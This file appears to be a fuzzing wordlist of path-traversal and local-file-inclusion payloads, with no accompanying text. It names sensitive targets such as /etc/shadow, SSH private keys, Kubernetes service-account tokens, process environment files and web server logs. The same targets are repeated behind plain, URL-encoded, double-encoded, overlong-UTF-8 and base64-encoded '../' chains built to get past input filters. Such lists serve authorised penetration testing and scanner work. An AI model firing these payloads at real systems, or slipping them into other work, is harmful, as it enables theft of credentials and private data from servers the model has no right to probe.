c:\windows\system32\license.rtf
c:\windows\system32\eula.txt
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]*   (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/self/cwd/index.php
/proc/self/cwd/main.py
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/certificate
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/mlocate.db
url:file:///etc/passwd
url:http://127.0.0.1:8080
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail
http://domain.tld/page.jsp?include=..;/..;/sensitive.txt 

../../../../../../../../../../c:\windows\system32\license.rtf
../../../../../../../../../../c:\windows\system32\eula.txt
../../../../../../../../../..//etc/issue
../../../../../../../../../..//etc/passwd
../../../../../../../../../..//etc/shadow
../../../../../../../../../..//etc/group
../../../../../../../../../..//etc/hosts
../../../../../../../../../..//etc/motd
../../../../../../../../../..//etc/mysql/my.cnf
../../../../../../../../../..//proc/[0-9]*/fd/[0-9]*   (first number is the PID, second is the filedescriptor)
../../../../../../../../../..//proc/self/environ
../../../../../../../../../..//proc/version
../../../../../../../../../..//proc/cmdline
../../../../../../../../../..//proc/sched_debug
../../../../../../../../../..//proc/mounts
../../../../../../../../../..//proc/net/arp
../../../../../../../../../..//proc/net/route
../../../../../../../../../..//proc/net/tcp
../../../../../../../../../..//proc/net/udp
../../../../../../../../../..//proc/self/cwd/index.php
../../../../../../../../../..//proc/self/cwd/main.py
../../../../../../../../../..//home/$USER/.bash_history
../../../../../../../../../..//home/$USER/.ssh/id_rsa
../../../../../../../../../..//run/secrets/kubernetes.io/serviceaccount/token
../../../../../../../../../..//run/secrets/kubernetes.io/serviceaccount/namespace
../../../../../../../../../..//run/secrets/kubernetes.io/serviceaccount/certificate
../../../../../../../../../..//var/run/secrets/kubernetes.io/serviceaccount
../../../../../../../../../..//var/lib/mlocate/mlocate.db
../../../../../../../../../..//var/lib/mlocate.db
../../../../../../../../../../url:file:///etc/passwd
../../../../../../../../../../url:http://127.0.0.1:8080
../../../../../../../../../../../
../../../../../../../../../../..\
../../../../../../../../../../..\/
../../../../../../../../../../%2e%2e%2f
../../../../../../../../../../%252e%252e%252f
../../../../../../../../../../%c0%ae%c0%ae%c0%af
../../../../../../../../../../%uff0e%uff0e%u2215
../../../../../../../../../../%uff0e%uff0e%u2216
../../../../../../../../../..//var/log/apache/access.log
../../../../../../../../../..//var/log/apache/error.log
../../../../../../../../../..//var/log/httpd/error_log
../../../../../../../../../..//usr/local/apache/log/error_log
../../../../../../../../../..//usr/local/apache2/log/error_log
../../../../../../../../../..//var/log/nginx/access.log
../../../../../../../../../..//var/log/nginx/error.log
../../../../../../../../../..//var/log/vsftpd.log
../../../../../../../../../..//var/log/sshd.log
../../../../../../../../../..//var/log/mail
../../../../../../../../../../http://domain.tld/page.jsp?include=..;/..;/sensitive.txt 
../../../../../../../../../../
/../../../../../../../../../../../../../../../../c:\windows\system32\license.rtf
/../../../../../../../../../../../../../../../../c:\windows\system32\eula.txt
/../../../../../../../../../../../../../../../..//etc/issue
/../../../../../../../../../../../../../../../..//etc/passwd
/../../../../../../../../../../../../../../../..//etc/shadow
/../../../../../../../../../../../../../../../..//etc/group
/../../../../../../../../../../../../../../../..//etc/hosts
/../../../../../../../../../../../../../../../..//etc/motd
/../../../../../../../../../../../../../../../..//etc/mysql/my.cnf
/../../../../../../../../../../../../../../../..//proc/[0-9]*/fd/[0-9]*   (first number is the PID, second is the filedescriptor)
/../../../../../../../../../../../../../../../..//proc/self/environ
/../../../../../../../../../../../../../../../..//proc/version
/../../../../../../../../../../../../../../../..//proc/cmdline
/../../../../../../../../../../../../../../../..//proc/sched_debug
/../../../../../../../../../../../../../../../..//proc/mounts
/../../../../../../../../../../../../../../../..//proc/net/arp
/../../../../../../../../../../../../../../../..//proc/net/route
/../../../../../../../../../../../../../../../..//proc/net/tcp
/../../../../../../../../../../../../../../../..//proc/net/udp
/../../../../../../../../../../../../../../../..//proc/self/cwd/index.php
/../../../../../../../../../../../../../../../..//proc/self/cwd/main.py
/../../../../../../../../../../../../../../../..//home/$USER/.bash_history
/../../../../../../../../../../../../../../../..//home/$USER/.ssh/id_rsa
/../../../../../../../../../../../../../../../..//run/secrets/kubernetes.io/serviceaccount/token
/../../../../../../../../../../../../../../../..//run/secrets/kubernetes.io/serviceaccount/namespace
/../../../../../../../../../../../../../../../..//run/secrets/kubernetes.io/serviceaccount/certificate
/../../../../../../../../../../../../../../../..//var/run/secrets/kubernetes.io/serviceaccount
/../../../../../../../../../../../../../../../..//var/lib/mlocate/mlocate.db
/../../../../../../../../../../../../../../../..//var/lib/mlocate.db
/../../../../../../../../../../../../../../../../url:file:///etc/passwd
/../../../../../../../../../../../../../../../../url:http://127.0.0.1:8080
/../../../../../../../../../../../../../../../../../
/../../../../../../../../../../../../../../../../..\
/../../../../../../../../../../../../../../../../..\/
/../../../../../../../../../../../../../../../../%2e%2e%2f
/../../../../../../../../../../../../../../../../%252e%252e%252f
/../../../../../../../../../../../../../../../../%c0%ae%c0%ae%c0%af
/../../../../../../../../../../../../../../../../%uff0e%uff0e%u2215
/../../../../../../../../../../../../../../../../%uff0e%uff0e%u2216
/../../../../../../../../../../../../../../../..//var/log/apache/access.log
/../../../../../../../../../../../../../../../..//var/log/apache/error.log
/../../../../../../../../../../../../../../../..//var/log/httpd/error_log
/../../../../../../../../../../../../../../../..//usr/local/apache/log/error_log
/../../../../../../../../../../../../../../../..//usr/local/apache2/log/error_log
/../../../../../../../../../../../../../../../..//var/log/nginx/access.log
/../../../../../../../../../../../../../../../..//var/log/nginx/error.log
/../../../../../../../../../../../../../../../..//var/log/vsftpd.log
/../../../../../../../../../../../../../../../..//var/log/sshd.log
/../../../../../../../../../../../../../../../..//var/log/mail
/../../../../../../../../../../../../../../../../http://domain.tld/page.jsp?include=..;/..;/sensitive.txt 
/../../../../../../../../../../../../../../../../
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/c:\windows\system32\license.rtf
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/c:\windows\system32\eula.txt
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//etc/issue
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//etc/passwd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//etc/shadow
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//etc/group
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//etc/hosts
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//etc/motd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//etc/mysql/my.cnf
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/[0-9]*/fd/[0-9]*   (first number is the PID, second is the filedescriptor)
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/self/environ
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/version
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/cmdline
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/sched_debug
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/mounts
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/net/arp
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/net/route
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/net/tcp
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/net/udp
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/self/cwd/index.php
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/self/cwd/main.py
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//home/$USER/.bash_history
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//home/$USER/.ssh/id_rsa
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//run/secrets/kubernetes.io/serviceaccount/token
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//run/secrets/kubernetes.io/serviceaccount/namespace
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//run/secrets/kubernetes.io/serviceaccount/certificate
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//var/run/secrets/kubernetes.io/serviceaccount
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//var/lib/mlocate/mlocate.db
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//var/lib/mlocate.db
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/url:file:///etc/passwd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/url:http://127.0.0.1:8080
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/../
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/..\
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/..\/
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/%2e%2e%2f
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/%252e%252e%252f
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/%c0%ae%c0%ae%c0%af
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/%uff0e%uff0e%u2215
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/%uff0e%uff0e%u2216
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//var/log/apache/access.log
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//var/log/apache/error.log
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//var/log/httpd/error_log
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//usr/local/apache/log/error_log
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//usr/local/apache2/log/error_log
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//var/log/nginx/access.log
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//var/log/nginx/error.log
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//var/log/vsftpd.log
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//var/log/sshd.log
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//var/log/mail
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/http://domain.tld/page.jsp?include=..;/..;/sensitive.txt 
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/c:\windows\system32\license.rtf
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/c:\windows\system32\eula.txt
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//etc/issue
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//etc/passwd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//etc/shadow
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//etc/group
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//etc/hosts
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//etc/motd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//etc/mysql/my.cnf
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/[0-9]*/fd/[0-9]*   (first number is the PID, second is the filedescriptor)
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/self/environ
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/version
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/cmdline
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/sched_debug
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/mounts
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/net/arp
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/net/route
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/net/tcp
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/net/udp
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/self/cwd/index.php
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//proc/self/cwd/main.py
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//home/$USER/.bash_history
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//home/$USER/.ssh/id_rsa
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//run/secrets/kubernetes.io/serviceaccount/token
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//run/secrets/kubernetes.io/serviceaccount/namespace
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//run/secrets/kubernetes.io/serviceaccount/certificate
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//var/run/secrets/kubernetes.io/serviceaccount
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//var/lib/mlocate/mlocate.db
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//var/lib/mlocate.db
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/url:file:///etc/passwd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/url:http://127.0.0.1:8080
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/../
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/..\
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/..\/
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/%2e%2e%2f
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/%252e%252e%252f
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/%c0%ae%c0%ae%c0%af
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/%uff0e%uff0e%u2215
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/%uff0e%uff0e%u2216
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//var/log/apache/access.log
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//var/log/apache/error.log
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//var/log/httpd/error_log
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//usr/local/apache/log/error_log
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//usr/local/apache2/log/error_log
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//var/log/nginx/access.log
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//var/log/nginx/error.log
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//var/log/vsftpd.log
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//var/log/sshd.log
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F//var/log/mail
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/http://domain.tld/page.jsp?include=..;/..;/sensitive.txt 
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v/c:\windows\system32\license.rtf
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v/c:\windows\system32\eula.txt
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//etc/issue
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//etc/passwd
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//etc/shadow
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//etc/group
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//etc/hosts
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//etc/motd
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//etc/mysql/my.cnf
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//proc/[0-9]*/fd/[0-9]*   (first number is the PID, second is the filedescriptor)
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//proc/self/environ
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//proc/version
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//proc/cmdline
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//proc/sched_debug
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//proc/mounts
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//proc/net/arp
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//proc/net/route
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//proc/net/tcp
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//proc/net/udp
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//proc/self/cwd/index.php
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//proc/self/cwd/main.py
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//home/$USER/.bash_history
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//home/$USER/.ssh/id_rsa
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//run/secrets/kubernetes.io/serviceaccount/token
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//run/secrets/kubernetes.io/serviceaccount/namespace
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//run/secrets/kubernetes.io/serviceaccount/certificate
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//var/run/secrets/kubernetes.io/serviceaccount
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//var/lib/mlocate/mlocate.db
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//var/lib/mlocate.db
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v/url:file:///etc/passwd
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v/url:http://127.0.0.1:8080
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v/../
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v/..\
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v/..\/
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v/%2e%2e%2f
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v/%252e%252e%252f
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v/%c0%ae%c0%ae%c0%af
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v/%uff0e%uff0e%u2215
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v/%uff0e%uff0e%u2216
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//var/log/apache/access.log
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//var/log/apache/error.log
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//var/log/httpd/error_log
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//usr/local/apache/log/error_log
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//usr/local/apache2/log/error_log
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//var/log/nginx/access.log
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//var/log/nginx/error.log
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//var/log/vsftpd.log
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//var/log/sshd.log
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v//var/log/mail
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v/http://domain.tld/page.jsp?include=..;/..;/sensitive.txt 
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v/
